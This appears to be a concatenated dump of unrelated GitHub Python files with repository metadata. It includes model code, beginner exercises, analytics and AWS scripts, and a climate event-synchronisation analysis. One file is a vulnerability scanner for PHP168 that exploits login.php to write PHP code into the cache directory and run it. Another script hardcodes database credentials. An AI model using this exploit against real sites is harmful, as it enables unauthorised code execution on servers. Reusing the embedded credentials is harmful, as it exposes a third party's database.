# minval=-1.0,
# maxval=1.0,
# name='z_test')
# return self._generate(z, is_training=False)
def encode(self, x):
z_mu, z_lv = self._encode(x, is_training=False)
return dict(mu=z_mu, log_var=z_lv)
def decode(self, z, y, tanh=False):
# if tanh:
# return self._generate(z, y, is_training=False)
# else:
# return self._generate(z, y, is_training=False)
xh, _ = self._generate(z, y, is_training=False)
# tf.summary.image('xh', tf.transpose(xh, [2, 1, 0, 3]))
# return self._filter(xh, is_training=False)
return xh
def discriminate(self, x):
'''
To estimate the EMD, we need D to assign a score per sample.
*The batches can be of different size
'''
# s_true, _ = self._discriminate(x_true, is_training=False)
# s_fake, _ = self._discriminate(x_fake, is_training=False)
# return s_true, s_fake
s, _ = self._discriminate(x, is_training=False)
return s
# def classify(self, x):
# return self._classify(tf.nn.softmax(x), is_training=False)
# def interpolate(self, x1, x2, n):
# ''' Interpolation from the latent space '''
# x1 = tf.expand_dims(x1, 0)
# x2 = tf.expand_dims(x2, 0)
# z1, _ = self._encode(x1, is_training=False)
# z2, _ = self._encode(x2, is_training=False)
# a = tf.reshape(tf.linspace(0., 1., n), [n, 1])
# z1 = tf.matmul(1. - a, z1)
# z2 = tf.matmul(a, z2)
# z = tf.nn.tanh(tf.add(z1, z2)) # Gaussian-to-Uniform
# xh = self._generate(z, is_training=False)
# xh = tf.concat(0, [x1, xh, x2])
# return xh
| [
"jjsyu0304@gmail.com"
] | jjsyu0304@gmail.com |
e8c658bb145209c4e3540ddf993832ff810fd254 | 31976379efa3e90cffe8eb8be2a1ab88fb233b14 | /1.BASIC PROGRAMS/5.arithmatic_op.py | e28b73059cdb42ef11beff85cfa1bb7823937a9a | [] | no_license | Vinaypatil-Ev/aniket | e5fadb504a2dc6cf0f40e565db963b3f3af8d699 | 530f7c7a0e4e96a7390c78dd3366da6d66e16884 | refs/heads/master | 2023-07-11T11:18:15.054165 | 2021-08-21T05:56:57 | 2021-08-21T05:56:57 | 397,871,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | # WAP to demonstrate arithmetic operation on two integer numbers.
print("Enter two digits")
a = float(input("Enter first digit: "))
b = float(input("Enter second digit: "))
print(f"{a} + {b} = {a + b}") # addition
print(f"{a} - {b} = {a - b}") # substraction
print(f"{a} * {b} = {a * b}") # mul
print(f"{a} / {b} = {a / b}") # div
print(f"{a} % {b} = {a % b}") # mod | [
"vinaypatil153@gmail.com"
] | vinaypatil153@gmail.com |
3491ef318b0885d7a517472a36167e2e55523e3e | a5cd7896d91cf67ede7aec721e73c837a4328d01 | /0008_rep_fields.py | 82b64874b1cac0bcc72242866df9e946dacfe1a9 | [] | no_license | DonCastillo/learning-python | 8bdb6e4bfebefa5a428a89c739db6f7142a759db | a5d803642d435f806209f1b9c5803672e89bf06d | refs/heads/master | 2023-04-08T13:26:59.506073 | 2021-04-17T03:38:29 | 2021-04-17T03:38:29 | 330,097,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | py | age = 24
name = "Tim"
# str() parses int to string
print("My age is " + str(age) + " years")
# replaces {0} to age
print("My age is {0} years".format(age))
# using printf version
print("My age is %d years old" % age)
# just like string template literal in JS. No need to use .format(value) function
print(name + f"'s age is {age} years old")
# should always starts with {0}
print("There are {0} days in {1}, {2}, {3}, {4}, {5}, {6}, and {7}"
.format(31, "Jan", "Mar", "May", "Jul", "Aug", "Oct", "Dec"))
print("There are {0} days in Jan, Mar, May, Jul, Aug, Oct, and Dec".format(31))
# {0} => 28
# {1} => 30
# {2} => 31
print("Jan: {2}, Feb: {0}, Mar: {2}, Apr: {1}, May: {2}, Jun: {1}, Jul: {2}, Aug: {2}, Sep: {1}, Oct: {2}, Nov: {1}, Dec: {2}"
.format(28, 30, 31))
print()
print("""Jan: {2},
Feb: {0}
Mar: {2}
Apr: {1}
May: {2}
Jun: {1}
Jul: {2}
Aug: {2}
Sep: {1}
Oct: {2}
Nov: {1}
Dec: {2}""".format(28, 30, 31)) | [
"don.qcastillo@yahoo.com"
] | don.qcastillo@yahoo.com |
ba990ba9894257dc692adaf65f93b509b0043716 | 55a4fa8f0fe859d9683b5dd826a9b8378a6503df | /python/AnalyzeUserEnjoyed.py | f3a5ebba9db0795b35a773660f87060d59355b19 | [] | no_license | rongc5/test | 399536df25d3d3e71cac8552e573f6e2447de631 | acb4f9254ecf647b8f36743899ae38a901b01aa6 | refs/heads/master | 2023-06-26T05:38:37.147507 | 2023-06-15T03:33:08 | 2023-06-15T03:33:08 | 33,905,442 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,153 | py | #coding=utf-8
#!/usr/bin/python
#Author zm
#time 2013-10-31 11:24:36
import os, sys, time, MySQLdb as MYDB, logging, datetime, logging.handlers, calendar, string
class UserEnjoyed:
def __init__(self, date=None):
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s ->%(message)s'
log = '%s.log' % ('UserEnjoyed',)
handler = logging.handlers.RotatingFileHandler(log, 'a', 256*1024*1024, 0)
formatter = logging.Formatter(format)
handler.setFormatter(formatter)
self.logger = logging.getLogger('test')
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
self.db = MYDB.connect('123.103.62.131', 'permitdbuser', 'permitdbpwd', 'statistics', 3306)
self.con = self.db.cursor()
charset = 'SET NAMES utf8'
self.con.execute(charset)
self.myepg = []
self.mydev = {}
self.myUserEnjoy = {}
self.epgType = ['56', '57', '59', '60', '69', '83', '84']
self.epg_sbuf = ''
self.epg_ebuf = ''
if not date:
self.curdate = date
def getPrevXdate(self, x):
timer = long(time.time())
timer = timer - x*24*60*60
stu = time.localtime(timer);
self.curdate = '%d-%02d-%02d' % (stu.tm_year, stu.tm_mon, stu.tm_mday)
def getDateForrmat(self, mydate):
if mydate.find('-') != -1 and mydate.find(':') == -1:
mydate = '%s %s:%s:%s' % (self.curdate, '00', '00', '00')
elif mydate.find('-') == -1 and mydate.find(':') != -1:
mydate = '%s %s' % (self.curdate, mydate)
elif mydate.find('-') == -1 and mydate.find(':') == -1:
mydate = '%s %s:%s:%s' % (self.curdate, '00', '00', '00')
#print 'hello', mydate
return mydate
def getTimer(self, formatter, mytime):
#print formatter, mytime
stu = time.strptime(mytime, formatter)
timer = time.mktime(stu)
return long(timer)
def load_epg_info(self):
sql = '''select epg_channleid, epg_programid, epg_stime, epg_etime, SUBSTRING(epg_propertyid, 2, 8) from %s where epg_date=DATE_FORMAT('%s', '%%Y-%%m-%%d') \
and epg_stime < epg_etime and LOCATE('55',epg_propertyid)>0 and LOCATE('76',epg_propertyid)=0;''' % ('epg_program_syn', self.curdate)
self.con.execute(sql)
rows = self.con.fetchall()
print sql
self.logger.info(sql)
stimer = 0
etimer = 0
timer = [0, 0]
for row in rows:
stime = ''
etime = ''
stime = '''%s''' % row[2]
etime = '''%s''' % row[3]
#print stime, etime, row[2], row[3], row[0], row[1]
stime = self.getDateForrmat(stime)
etime = self.getDateForrmat(etime)
#print stime, etime, row[2], row[3], row[0], row[1]
timer[0] = self.getTimer('''%Y-%m-%d %H:%M:%S''', stime)
timer[1] = self.getTimer('''%Y-%m-%d %H:%M:%S''', etime)
#print timer[0], timer[1]
if timer[0] < stimer or not stimer:
#print timer[0], stimer, self.epg_sbuf
stimer = timer[0]
self.epg_sbuf = stime
#print stimer
if timer[1] > etimer:
etimer = timer[1];
self.epg_ebuf = etime
#print(self.epg_ebuf)
cid = int(row[0])
pid = int(row[1])
propertyid = '%s' % (row[4], )
mychannle = (cid, pid, stimer, etimer, propertyid)
#print mychannle
self.myepg.insert(0, mychannle)
def load_dev_info(self):
sql = '''select a.id, a.cid as channelid, a.mac, UNIX_TIMESTAMP(a.start) as stimer, UNIX_TIMESTAMP(a.end) as etimer from \
statistics.t_devChannelInfo a, haierdb.udev_basic b where a.start < a.end and a.cid != 0 and a.mac = b.mac and b.isactiv = 1 \
and a.start BETWEEN '%s' and '%s' UNION select a.id, a.cid as channelid, a.mac, UNIX_TIMESTAMP(a.start) as stimer, \
UNIX_TIMESTAMP(a.end) as etimer from statistics.t_devChannelInfo a, haierdb.udev_basic b where a.start < a.end and a.cid != 0 \
and a.mac = b.mac and b.isactiv = 1 and a.end BETWEEN '%s' and '%s' ''' % (self.epg_sbuf, self.epg_ebuf, self.epg_sbuf, self.epg_ebuf)
#print sql
self.con.execute(sql)
rows = self.con.fetchall()
self.logger.info(sql)
for row in rows:
id = int(row[0])
cid = int(row[1])
mac = str(row[2])
stimer = long(row[3])
etimer = long(row[4])
mydev = (cid, mac, stimer, etimer)
self.mydev[id] = mydev
def getUserEnjoy(self):
self.myepg.sort(lambda x,y:cmp(x[0],y[0]))
for i in self.mydev:
mydev = self.mydev[i]
#mac = "%s" % (mydev[1])
for k in self.myepg:
myepg = k
if mydev[0] < k[0]:
continue;
elif mydev[0] > k[0]:
break
elif mydev[0] == k[0]:
if (mydev[2] >= myepg[2] and mydev[2] <= myepg[3]) or \
(mydev[3] >= myepg[2] and mydev[3] <= myepg[2]) or \
(mydev[2 <= myepg[3] and mydev[3] >= myepg[2]]):
#print mydev[0], k[0], mydev[2], mydev[3], myepg[2], myepg[3]
for m in self.epgType:
epg_propertyid = '%s' % myepg[4]
#print epg_propertyid, m
if epg_propertyid.find(m) == -1:
continue
else:
a = (mydev[1], m)
#print a
if not self.myUserEnjoy.has_key(a):
self.myUserEnjoy[a] = [0, 0, 0]
'''list[1] == 0 means count doesn't changed, list[2] 0 means count ,
list[0] == 0 means mysql table doesn't exist mac
'''
self.myUserEnjoy[a][2] += 1
self.myUserEnjoy[a][1] = 1
break
else:
continue
def saveUserEnjoy(self):
for k, m in self.myUserEnjoy.iteritems():
if m[0] == 0 and m[2] != 0:
sql = '''insert into UserEnjoyInfo(mac, epg_propertyid, count, uptime) values('%s', '%s', '%d', NOW())''' % (k[0], k[1], m[2])
elif m[0] == 1 and m[1] == 1 and m[2] != 0:
sql = '''UPDATE UserEnjoyInfo set count = '%d', uptime = NOW() where mac = '%s' and epg_propertyid = '%s' ''' % (m[2], k[0], k[1])
else:
continue
print sql
self.con.execute(sql)
self.logger.debug(sql)
self.db.commit()
def load_UserEnjoy_from_mysql(self):
sql = '''SELECT mac, epg_propertyid, count from statistics.UserEnjoyInfo'''
self.con.execute(sql)
self.logger.info(sql)
rows = self.con.fetchall()
for row in rows:
mac = str(row[0])
propertyid = str(row[1])
count = int(row[2])
a= (mac, propertyid)
self.myUserEnjoy[a] = [1, 0, count]
def close(self):
self.con.close()
self.db.close()
self.myepg = {}
def main():
Analyl = UserEnjoyed()
Analyl.getPrevXdate(1)
Analyl.load_UserEnjoy_from_mysql()
Analyl.load_epg_info()
Analyl.load_dev_info()
Analyl.getUserEnjoy()
Analyl.saveUserEnjoy()
Analyl.close()
if __name__ == '__main__':
main()
| [
"rongc5@users.noreply.github.com"
] | rongc5@users.noreply.github.com |
dac1b1c0fe503898cc8fca5d9a91fbdca2a59fe0 | a694e5c183ad3bd394b1a1e065c42bf372c3fdd8 | /AWSTrials/Python/snstest1/subscribe_email_to_topic.py | dbdb4078f1f83f955c66e0466ab7cd2b735e8621 | [] | no_license | rjmeats/AWS-Trials | e788c675947030047a573a79f0653dfec77b6b62 | 899207a2b53ad9dc7d58c7f015016f1f44d01cf0 | refs/heads/master | 2020-04-19T14:25:34.317200 | 2019-12-13T16:25:50 | 2019-12-13T16:25:50 | 168,244,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sns.html
import sys
import time
import boto3
import list_topics as lt
sns_client = boto3.client('sns')
def subscribe_to_topic_for_email(topicname, address) :
arn = lt.convert_topic_name_to_arn(topicname)
# Check for existing subscription for this combo ?
if arn == "" :
print("Topic", topicname, "not found")
else :
print("Subscribing", address, "to topic:", topicname, "arn =", arn)
response = sns_client.subscribe(
TopicArn = arn,
Protocol = 'email',
Endpoint = address, # No restriction on what this is, could send to anyone!
ReturnSubscriptionArn = True
)
print("Response:", response)
# NB Confirmation message is sent as an email to the address above, containing a link to click to confirm the submission (with the confirmation token a URL
# parameter). So the confirmation process is not completed here - the subscription is in a pending state.
# If the module is re-run with the same topic/endpoint, another email is sent, and when confirmed it looks like the original subscription is replaced.
if __name__ == "__main__" :
print(len(sys.argv))
if len(sys.argv) < 2 :
print("*** No email address argument specified")
else :
address = sys.argv[1]
print(sns_client)
print()
subscribe_to_topic_for_email('test_topic2', address)
print()
| [
"35453720+rjmeats@users.noreply.github.com"
] | 35453720+rjmeats@users.noreply.github.com |
2ab04509e24100a9ede7ef6928825b1b175c0040 | 1ac340af4d1dbeb50d01cc9b093868c17e1080e6 | /Lists/Basics/01. invert_values.py | 0edc0d0d3ba3d1dea6ea2745269d03449cdaf107 | [] | no_license | geodimitrov/Python-Fundamentals-SoftUni | d7a53431aeac53e543216ed076b13aba2a5e3448 | 9f848f9921ffa03c0ae6c8664a344ac8eb489e04 | refs/heads/main | 2023-04-13T13:29:42.469616 | 2021-04-21T19:10:28 | 2021-04-21T19:10:28 | 323,114,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py |
# 1. Introduce input variable
string = input()
# 2. Use the split method to split the string into list
list_string = string.split()
new_list = []
# 3. Run a for loop to filter nums using conditions
for element in list_string:
num = int(element)
if num > 0:
new_list.append(-num)
elif num < 0:
new_list.append(abs(num))
else:
new_list.append(num)
print(new_list)
| [
"noreply@github.com"
] | geodimitrov.noreply@github.com |
ad9d846cfb0da2a2a9803522deae870af71d34bd | 56040a3e7d5e73c8fdca6dc70a7c5522aa4310b5 | /quiz/serializers.py | 7118fe3e98ac19881fd727c93570498e019abf09 | [] | no_license | kimbumso/heroku-repo | ea0dbbdc34439f51dfe0a5e201a9f117399b634d | 8774a2a592bb418a4e50d05d827fdae2cf5611f8 | refs/heads/master | 2023-01-23T22:18:37.401553 | 2020-12-04T02:43:00 | 2020-12-04T02:43:00 | 317,876,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | from rest_framework import serializers
from .models import Quiz
class QuizSerializer(serializers.ModelSerializer):
class Meta:
model = Quiz
fields = ('title', 'content', 'answer') | [
"k101413@naver.com"
] | k101413@naver.com |
3e01df71c43a92672a6b4387ffcd0d505ed0ef01 | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /cms/php168/php168_login_getshell.py | 08224eb0012c6eed6e10a98c7606dfd32c336bc4 | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,581 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: PHP168 login.php GETSHELL漏洞
referer: http://wooyun.org/bugs/wooyun-2014-050515
author: Lucifer
description: Powered by php168 v6或者一下版本v5、v4、v3、v2、v1会搜索到很多很多相关的网站,login.php文件可以把代码写入cache目录中。
'''
import sys
import requests
import warnings
from termcolor import cprint
class php168_login_getshell_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/login.php?makehtml=1&chdb[htmlname]=404.php&chdb[path]=cache&content=<?php%20echo%20md5(1234);?>"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
verifyurl = self.url + "/cache/404.php"
req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在PHP168 GETSHELL漏洞...(高危)\tpayload: "+verifyurl, "red")
else:
cprint("[-]不存在php168_login_getshell漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = php168_login_getshell_BaseVerify(sys.argv[1])
testVuln.run() | [
"wangxinyu@vackbot.com"
] | wangxinyu@vackbot.com |
86024511a554590ea7ae122070eab0f619c43d93 | 4fd5860beb1e6809eee297509bcc776dfca40aca | /event_synchronization_analysis/ed_lf_es_mc.py | cab4b7d9f4e05674b37592ab836218dde4a38ed7 | [] | no_license | manmeet3591/fingerprint-volcano-enso-im | 40a41eca517abdd09079feb7ae58cc866343d6a8 | 21f39125ece4d03c5ee2961e4aae3768ee61cdb8 | refs/heads/master | 2021-07-05T09:49:28.858614 | 2021-04-19T02:55:45 | 2021-04-19T02:55:45 | 229,057,834 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,004 | py |
# coding: utf-8
# In[1]:
from __future__ import print_function, division
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import datetime as dt
import warnings
import random
warnings.filterwarnings("ignore")
sns.set()
# In[2]:
nino3 = np.genfromtxt ('tas_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_1_nino3_tseries.csv', delimiter=",")
ismr = np.genfromtxt ('pr_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_india_goswami_2002_tseries.csv', delimiter=",")
vrf = np.genfromtxt ('sigl.txt', delimiter=",")
print(nino3.shape)
print(ismr.shape)
print(vrf.shape)
# In[3]:
def common_time_axis(dismr, verbose=True):
"""
Generates common time axis for Nino3 and ISMR time series.
"""
# generate the time axis
Nt = len(dismr)
time = [dt.datetime(850, 1, 15)]
for i in range(1, len(dismr)):
y = time[i - 1].year
m = time[i - 1].month
if m == 12:
y += 1
m = 0
time.append(dt.datetime(y, m + 1, 15))
time = np.array(time)
return time
def yearly_time_axis(dvolc, verbose=True):
"""
Generates time axis for yearly data
"""
Nt = len(dvolc)
time = [dt.datetime(900, 1, 15)]
for i in range(1, len(dvolc)):
y = time[i - 1].year
y += 1
time.append(dt.datetime(y, 1, 15))
time = np.array(time)
return time
def moving_average_anomaly(dismr,n=360):
"""
Generates moving average anomaly of long time series
"""
#print(dismr.shape)
dismr_anom = np.zeros((dismr.shape[0]))
dismr_std = np.zeros((dismr.shape[0]))
dismr_anom[0:n/2] = ( dismr[0:n/2] - np.mean(dismr[0:n]) )/np.std(dismr[0:n])
dismr_anom[dismr.shape[0]-n/2:] = ( dismr[dismr.shape[0]-n/2:] - np.mean(dismr[dismr.shape[0]-n:]) )/np.std(dismr[dismr.shape[0]-n:])
#print(dismr_anom)
dismr_std[0:n/2] = np.std(dismr[0:n])
dismr_std[dismr.shape[0]-n/2:] = np.std(dismr[dismr.shape[0]-n:])
for i in range(np.int(n/2),np.int(dismr.shape[0]-n/2)):
dismr_anom[i] = (dismr[i] - np.mean(dismr[i-n/2:i+n/2]))/np.std(dismr[i-n/2:i+n/2])
dismr_std[i] = np.std(dismr[i-n/2:i+n/2])
return dismr_anom, dismr_std
def EventSync(es1, es2, taumax):
"""
Compute non-vectorized event synchronization
:type es1: 1D Numpy array
:arg es1: Event series containing '0's and '1's
:type es2: 1D Numpy array
:arg es2: Event series containing '0's and '1's
:float return: Event synchronization es2 to es1
"""
ex = np.arange(len(es1))[es1 == 1]
ey = np.arange(len(es2))[es2 == 1]
lx = len(ex)
ly = len(ey)
count = 0
if lx!=0 and ly!=0:
for m in range(1, lx-1):
for n in range(1, ly-1):
dst = ex[m] - ey[n]
if abs(dst) > taumax:
continue
elif dst == 0:
count += 0.5
continue
# finding the dynamical delay tau
tmp = ex[m+1] - ex[m]
if tmp > ex[m] - ex[m-1]:
tmp = ex[m] - ex[m-1]
tau = ey[n+1] - ey[n]
if tau > ey[n] - ey[n-1]:
tau = ey[n] - ey[n-1]
if tau > tmp:
tau = tmp
tau = tau / 2
if dst > 0 and dst <= tau:
count += 1
#print("count = ",count)
#print("Q = ",np.sqrt((lx-2) * (ly-2)))
#print("lx,ly,Q =",lx,ly,count)
if lx!=0 and ly!=0:
return count / np.sqrt((lx) * (ly))
#return count / np.sqrt((lx-2) * (ly-2))
else:
return 0.0
def my_shuffle(array):
random.shuffle(array)
return array
# In[12]:
ismr_anom, ismr_std = moving_average_anomaly(ismr)
nino3_anom, nino3_std = moving_average_anomaly(nino3)
es_ismr_d = np.zeros((ismr_anom.shape[0]))
es_ismr_f = np.zeros((ismr_anom.shape[0]))
es_nino3_en = np.zeros((nino3_anom.shape[0]))
es_nino3_ln = np.zeros((nino3_anom.shape[0]))
es_ismr_f[ismr_anom>1.0] = 1.0
es_ismr_d[ismr_anom<-1.0] = 1.0
es_nino3_en[nino3_anom>0.5] = 1.0
es_nino3_ln[nino3_anom<-0.5] = 1.0
taumax = 24
# In[13]:
Q_hist_ed = np.zeros((es_ismr_d.shape[0]-taumax))
Q_hist_lf = np.zeros((es_ismr_d.shape[0]-taumax))
es_ismr_d_mc = my_shuffle(es_ismr_d)
es_ismr_f_mc = my_shuffle(es_ismr_f)
for i in range(es_ismr_d.shape[0]-taumax):
Q_hist_12 = EventSync(es_ismr_d[i:i+taumax], es_nino3_en[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_en[i:i+taumax], es_ismr_d[i:i+taumax],taumax)
Q_hist_ed[i] = Q_hist_12 + Q_hist_21
Q_hist_12 = EventSync(es_ismr_f[i:i+taumax], es_nino3_ln[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_ln[i:i+taumax], es_ismr_f[i:i+taumax],taumax)
Q_hist_lf[i] = Q_hist_12 + Q_hist_21
# In[15]:
np.savetxt("Q_hist_ed.csv", Q_hist_ed, delimiter=",")
np.savetxt("Q_hist_lf.csv", Q_hist_lf, delimiter=",")
# In[27]:
| [
"manmeet20singh11@gmail.com"
] | manmeet20singh11@gmail.com |
513abcefad476ebd3b58a2abd88cce66f1f8ecbf | 2880756e65bc323e89f1c9e873af10170720841a | /src/vidtrest/apps/vid/urls.py | d896491578ac6cf8faa2fed9d6c52520ee8dc407 | [] | no_license | rosscdh/vidtrest | 91419474a59cd5351ebacb5c8b3ec441a5e97a8c | 03e4188d1333361ebf5af856c71a41081e5b4fd0 | refs/heads/main | 2023-06-26T16:45:24.984152 | 2023-06-25T00:21:13 | 2023-06-25T00:21:13 | 91,779,356 | 0 | 0 | null | 2021-11-08T15:17:34 | 2017-05-19T07:39:04 | CSS | UTF-8 | Python | false | false | 261 | py | # -*- coding: utf-8 -*-
from django.urls import include, re_path
from . import views
urlpatterns = [
re_path(r'^search/$', views.VidSearchView.as_view(), name='search'),
re_path(r'^(?P<uuid>[0-9a-z-]+)/$', views.DetailView.as_view(), name='detail'),
] | [
"r.crawford@example.com"
] | r.crawford@example.com |
03a9dfea771fb783bbd10950701d0049f6fa4eb3 | b76e39e535499704368eddc26237dc0016ef7d06 | /RailRites/allsiemensdriveprocessing.py | a9963fed91147d1a03a027d0f56cd7e4d6f3f9fa | [] | no_license | BUBAIMITRA2018/castersimulation | 0532e53df7d346c2824e577cc91cd0ac2ce4694c | eca5fddff5c0f33f785168f6b1e9f572c1622be0 | refs/heads/master | 2022-12-10T02:45:04.207196 | 2020-09-09T05:35:54 | 2020-09-09T05:35:54 | 260,110,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py |
from observable import *
import logging
from clientcomm_v1 import *
from readgeneral_v2 import *
logger = logging.getLogger("main.log")
threadlist = []
class AreaObserver:
def __init__(self, observable):
observable.register_observer(self)
def notify(self, *args, **kwargs):
for item in args[0]:
try:
# threading = multiprocessing.Process(target=self.callmotor2dprocess,args=(item))
thread = threading.Thread(target=self.callsiemendsdriveprocess, args=[item])
threadlist.append(thread)
except Exception as e:
level = logging.INFO
messege = "NOTIFY" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def callsiemendsdriveprocess(self, item):
while True:
try:
item.driveprocess
except Exception as e:
level = logging.INFO
messege = "calldriveprocess" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def __init__(self, alldevices, filename):
self.subject = Observable()
self.alldevices = alldevices
self.client = Communication()
self.sta_con_plc = self.client.opc_client_connect(filename)
self.observer = AreaObserver(self.subject)
self.readgeneral = ReadGeneral(self.sta_con_plc)
def process(self, filename):
try:
for area, devices in readkeyandvalues(self.alldevices):
areavalue = self.readgeneral.readsymbolvalue(area, 'S7WLBit', 'PA')
if areavalue == 1:
self.observer.notify(devices, filename)
for j in threadlist:
j.start()
except Exception as e:
level = logging.INFO
messege = "PROCCESS" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def readkeyandvalues(alldevice):
siemensdrivedictionary = alldevice.allsiemensdrives.dictionary
areas = list(siemensdrivedictionary.keys())
n = 0
while n < len(areas):
area = areas[n]
devices = siemensdrivedictionary[area]
yield area,devices
n = n + 1
| [
"subrata.mitra@sms-group.com"
] | subrata.mitra@sms-group.com |
a12bb15a56a2b1eeb046125d82fd52c32eab9ff4 | 50e9f616351ef8e0a78d62109f69b4b026a0cd63 | /ParticleSegmentation/predict.py | e96d3d94f366959057fc4b17a58700746aa69e83 | [
"MIT"
] | permissive | Liushuhuibupt/PariticleSegmentation | c45318d628f4d2af2b939c748f78566d849c731b | 8606012907c498227c2695f3c963c116ae6fba66 | refs/heads/main | 2023-06-26T05:10:04.333984 | 2021-07-28T01:27:51 | 2021-07-28T01:27:51 | 367,369,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,745 | py | # -*- coding: utf-8 -*-
from nets.pspnet import mobilenet_pspnet
import numpy as np
import random
import copy
import os
from PIL import Image
import cv2
import matplotlib.pyplot as plt
#class_colors = [[0,0,0],[0,255,0]]
NCLASSES = 2
HEIGHT = 256
WIDTH = 256
model = mobilenet_pspnet(n_classes=NCLASSES,input_height=HEIGHT, input_width=WIDTH)
model.load_weights("./logs/ep100-loss0.004-val_loss0.060.h5")
imgs = os.listdir("./img/")
#imgs = os.listdir("C:/Users/David/Workspaces/liushuhui_1_david_lw-Semantic-Segmentation-master/Semantic-Segmentation/pspnet_Mobile/dataset2/image")
for png in imgs:
img = cv2.imread("./img/"+png,cv2.IMREAD_UNCHANGED)
#img = cv2.imread("./img/"+png)
old_img = img.copy()
#old_img=cv2.resize(old_img,(WIDTH,HEIGHT))
#img = img[:,:,0]
# = img.shape[0]
#orininal_w = img.shape[1]
#img.resize((WIDTH,HEIGHT))
#img = np.array(img)
img = img/255.
img = img.reshape(-1,HEIGHT,WIDTH,1)
pr = (model.predict(img)[1])[0]
#['predictRegion'][0]
pr = pr.reshape((int(HEIGHT), int(WIDTH),NCLASSES)).argmax(axis=-1)
plt.imshow(pr)
seg_img = (np.uint8(pr*255.))
#seg_img.resize(orininal_w,orininal_h)
#seg_img=cv2.resize(seg_img,(orininal_w,orininal_h))
#color_img = cv2.cvtColor(old_img,cv2.COLOR_Gra2)
contours, hierarchy = cv2.findContours(seg_img,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
for c in contours:
cv2.drawContours(old_img, [c], -1, (255, 0, 0), 1)
cv2.imwrite("./img_out_contour_diceloss/"+png,old_img)
# img = Image.open("./img/"+png)
# #img = Image.open(("C:/Users/David/Workspaces/liushuhui_1_david_lw-Semantic-Segmentation-master/Semantic-Segmentation/pspnet_Mobile/dataset2/image/"+jpg)
# old_img = copy.deepcopy(img)
# orininal_h = np.array(img).shape[0]
# orininal_w = np.array(img).shape[1]
#
# img = img.resize((WIDTH,HEIGHT))
# img = np.array(img)
# img = img/255.
# img = img.reshape(-1,HEIGHT,WIDTH,1)
# pr = model.predict(img)[0]
#
# pr = pr.reshape((int(HEIGHT), int(WIDTH),NCLASSES)).argmax(axis=-1)
#
#
##
## seg_img = np.zeros((int(HEIGHT/4), int(WIDTH/4),3))
## colors = class_colors
##
## for c in range(NCLASSES):
## seg_img[:,:,0] += ( (pr[:,: ] == c )*( colors[c][0] )).astype('uint8')
## seg_img[:,:,1] += ((pr[:,: ] == c )*( colors[c][1] )).astype('uint8')
## seg_img[:,:,2] += ((pr[:,: ] == c )*( colors[c][2] )).astype('uint8')
##
# seg_img = Image.fromarray(np.uint8(pr*255.)).resize((orininal_w,orininal_h))
#
# image = Image.blend(old_img,seg_img,0.3)
# #image = seg_img
# image.save("./img_out_blend/"+png)
| [
"noreply@github.com"
] | Liushuhuibupt.noreply@github.com |
25de4dae37a97d59eb5f38d7d423d4cc308798f7 | ee9c66231d6ff744e3757d5b08dc9916fa0cd5df | /utils/file_obj.py | 3792fbbaf198ed36488c6894ffc07eaacf7fb290 | [] | no_license | sidra-asa/Quark_api | f8eaee3863c30384f0d260d61b627c0375b60c41 | 28c7ef58689f0c4aeb943c0d408e9cda037d9c61 | refs/heads/master | 2022-12-08T14:18:53.111983 | 2019-10-18T01:59:59 | 2019-10-18T01:59:59 | 194,219,721 | 1 | 0 | null | 2022-12-08T05:51:56 | 2019-06-28T06:29:42 | Python | UTF-8 | Python | false | false | 1,274 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import binascii
import hashlib
import pydeep
import logging
class File:
"""File hashes"""
def __init__(self, data):
self.result = {}
self._file_data = data
self.calc_hashes()
logging.debug("file hashes: {0}".format(self.result))
def calc_hashes(self):
data = self._file_data
crc = 0
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
sha512 = hashlib.sha512()
crc = binascii.crc32(data, crc)
md5.update(data)
sha1.update(data)
sha256.update(data)
sha512.update(data)
self.result['md5'] = md5.hexdigest()
self.result['sha1'] = sha1.hexdigest()
self.result['sha256'] = sha256.hexdigest()
self.result['sha512'] = sha512.hexdigest()
